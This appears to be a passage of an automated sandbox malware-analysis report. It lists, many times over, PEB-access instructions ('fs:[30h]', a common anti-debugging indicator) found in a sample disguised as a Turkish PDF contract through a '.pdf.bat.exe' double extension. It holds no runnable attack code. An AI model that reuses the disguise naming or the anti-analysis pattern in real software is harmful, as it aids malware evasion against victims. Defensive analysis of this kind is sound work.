        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B890F8 mov eax, dword ptr fs:[00000030h]2_2_32B890F8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B890F8 mov eax, dword ptr fs:[00000030h]2_2_32B890F8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C64080 mov eax, dword ptr fs:[00000030h]2_2_32C64080
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C64080 mov eax, dword ptr fs:[00000030h]2_2_32C64080
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C64080 mov eax, dword ptr fs:[00000030h]2_2_32C64080
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C64080 mov eax, dword ptr fs:[00000030h]2_2_32C64080
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C64080 mov eax, dword ptr fs:[00000030h]2_2_32C64080
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C64080 mov eax, dword ptr fs:[00000030h]2_2_32C64080
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C64080 mov eax, dword ptr fs:[00000030h]2_2_32C64080
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCD0F0 mov eax, dword ptr fs:[00000030h]2_2_32BCD0F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCD0F0 mov ecx, dword ptr fs:[00000030h]2_2_32BCD0F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8C0F6 mov eax, dword ptr fs:[00000030h]2_2_32B8C0F6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3F0A5 mov eax, dword ptr fs:[00000030h]2_2_32C3F0A5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3F0A5 mov eax, dword ptr fs:[00000030h]2_2_32C3F0A5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3F0A5 mov eax, dword ptr fs:[00000030h]2_2_32C3F0A5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3F0A5 mov eax, dword ptr fs:[00000030h]2_2_32C3F0A5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3F0A5 mov eax, dword ptr fs:[00000030h]2_2_32C3F0A5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3F0A5 mov eax, dword ptr fs:[00000030h]2_2_32C3F0A5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3F0A5 mov eax, dword ptr fs:[00000030h]2_2_32C3F0A5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAB0D0 mov eax, dword ptr fs:[00000030h]2_2_32BAB0D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4B0AF mov eax, dword ptr fs:[00000030h]2_2_32C4B0AF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B0D6 mov eax, dword ptr fs:[00000030h]2_2_32B8B0D6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B0D6 mov eax, dword ptr fs:[00000030h]2_2_32B8B0D6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B0D6 mov eax, dword ptr fs:[00000030h]2_2_32B8B0D6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B0D6 mov eax, dword ptr fs:[00000030h]2_2_32B8B0D6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C650B7 mov eax, dword ptr fs:[00000030h]2_2_32C650B7
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8D02D mov eax, dword ptr fs:[00000030h]2_2_32B8D02D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C6505B mov eax, dword ptr fs:[00000030h]2_2_32C6505B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2010 mov ecx, dword ptr fs:[00000030h]2_2_32BD2010
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B98009 mov eax, dword ptr fs:[00000030h]2_2_32B98009
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB5004 mov eax, dword ptr fs:[00000030h]2_2_32BB5004
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB5004 mov ecx, dword ptr fs:[00000030h]2_2_32BB5004
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B97072 mov eax, dword ptr fs:[00000030h]2_2_32B97072
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B96074 mov eax, dword ptr fs:[00000030h]2_2_32B96074
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B96074 mov eax, dword ptr fs:[00000030h]2_2_32B96074
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B91051 mov eax, dword ptr fs:[00000030h]2_2_32B91051
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B91051 mov eax, dword ptr fs:[00000030h]2_2_32B91051
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC0044 mov eax, dword ptr fs:[00000030h]2_2_32BC0044
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC41BB mov ecx, dword ptr fs:[00000030h]2_2_32BC41BB
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC41BB mov eax, dword ptr fs:[00000030h]2_2_32BC41BB
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC41BB mov eax, dword ptr fs:[00000030h]2_2_32BC41BB
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE1A4 mov eax, dword ptr fs:[00000030h]2_2_32BCE1A4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE1A4 mov eax, dword ptr fs:[00000030h]2_2_32BCE1A4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C581EE mov eax, dword ptr fs:[00000030h]2_2_32C581EE
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C581EE mov eax, dword ptr fs:[00000030h]2_2_32C581EE
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1190 mov eax, dword ptr fs:[00000030h]2_2_32BD1190
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1190 mov eax, dword ptr fs:[00000030h]2_2_32BD1190
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB9194 mov eax, dword ptr fs:[00000030h]2_2_32BB9194
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B94180 mov eax, dword ptr fs:[00000030h]2_2_32B94180
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B94180 mov eax, dword ptr fs:[00000030h]2_2_32B94180
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B94180 mov eax, dword ptr fs:[00000030h]2_2_32B94180
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B891F0 mov eax, dword ptr fs:[00000030h]2_2_32B891F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B891F0 mov eax, dword ptr fs:[00000030h]2_2_32B891F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA01F1 mov eax, dword ptr fs:[00000030h]2_2_32BA01F1
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA01F1 mov eax, dword ptr fs:[00000030h]2_2_32BA01F1
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA01F1 mov eax, dword ptr fs:[00000030h]2_2_32BA01F1
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF1F0 mov eax, dword ptr fs:[00000030h]2_2_32BBF1F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF1F0 mov eax, dword ptr fs:[00000030h]2_2_32BBF1F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B881EB mov eax, dword ptr fs:[00000030h]2_2_32B881EB
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A1E3 mov eax, dword ptr fs:[00000030h]2_2_32B9A1E3
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A1E3 mov eax, dword ptr fs:[00000030h]2_2_32B9A1E3
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A1E3 mov eax, dword ptr fs:[00000030h]2_2_32B9A1E3
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A1E3 mov eax, dword ptr fs:[00000030h]2_2_32B9A1E3
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A1E3 mov eax, dword ptr fs:[00000030h]2_2_32B9A1E3
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB1E0 mov eax, dword ptr fs:[00000030h]2_2_32BBB1E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB1E0 mov eax, dword ptr fs:[00000030h]2_2_32BBB1E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB1E0 mov eax, dword ptr fs:[00000030h]2_2_32BBB1E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB1E0 mov eax, dword ptr fs:[00000030h]2_2_32BBB1E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB1E0 mov eax, dword ptr fs:[00000030h]2_2_32BBB1E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB1E0 mov eax, dword ptr fs:[00000030h]2_2_32BBB1E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB1E0 mov eax, dword ptr fs:[00000030h]2_2_32BBB1E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B991E5 mov eax, dword ptr fs:[00000030h]2_2_32B991E5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B991E5 mov eax, dword ptr fs:[00000030h]2_2_32B991E5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C651B6 mov eax, dword ptr fs:[00000030h]2_2_32C651B6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA01C0 mov eax, dword ptr fs:[00000030h]2_2_32BA01C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA01C0 mov eax, dword ptr fs:[00000030h]2_2_32BA01C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA51C0 mov eax, dword ptr fs:[00000030h]2_2_32BA51C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA51C0 mov eax, dword ptr fs:[00000030h]2_2_32BA51C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA51C0 mov eax, dword ptr fs:[00000030h]2_2_32BA51C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA51C0 mov eax, dword ptr fs:[00000030h]2_2_32BA51C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C2314A mov eax, dword ptr fs:[00000030h]2_2_32C2314A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C2314A mov eax, dword ptr fs:[00000030h]2_2_32C2314A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C2314A mov eax, dword ptr fs:[00000030h]2_2_32C2314A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C2314A mov eax, dword ptr fs:[00000030h]2_2_32C2314A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C63157 mov eax, dword ptr fs:[00000030h]2_2_32C63157
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C63157 mov eax, dword ptr fs:[00000030h]2_2_32C63157
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C63157 mov eax, dword ptr fs:[00000030h]2_2_32C63157
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC7128 mov eax, dword ptr fs:[00000030h]2_2_32BC7128
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC7128 mov eax, dword ptr fs:[00000030h]2_2_32BC7128
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC0118 mov eax, dword ptr fs:[00000030h]2_2_32BC0118
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F113 mov eax, dword ptr fs:[00000030h]2_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB510F mov eax, dword ptr fs:[00000030h]2_2_32BB510F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9510D mov eax, dword ptr fs:[00000030h]2_2_32B9510D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B96179 mov eax, dword ptr fs:[00000030h]2_2_32B96179
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BE717A mov eax, dword ptr fs:[00000030h]2_2_32BE717A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BE717A mov eax, dword ptr fs:[00000030h]2_2_32BE717A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC716D mov eax, dword ptr fs:[00000030h]2_2_32BC716D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC415F mov eax, dword ptr fs:[00000030h]2_2_32BC415F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1A130 mov eax, dword ptr fs:[00000030h]2_2_32C1A130
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F13E mov eax, dword ptr fs:[00000030h]2_2_32C4F13E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8A147 mov eax, dword ptr fs:[00000030h]2_2_32B8A147
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8A147 mov eax, dword ptr fs:[00000030h]2_2_32B8A147
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8A147 mov eax, dword ptr fs:[00000030h]2_2_32B8A147
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B98690 mov eax, dword ptr fs:[00000030h]2_2_32B98690
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0C6F2 mov eax, dword ptr fs:[00000030h]2_2_32C0C6F2
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0C6F2 mov eax, dword ptr fs:[00000030h]2_2_32C0C6F2
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
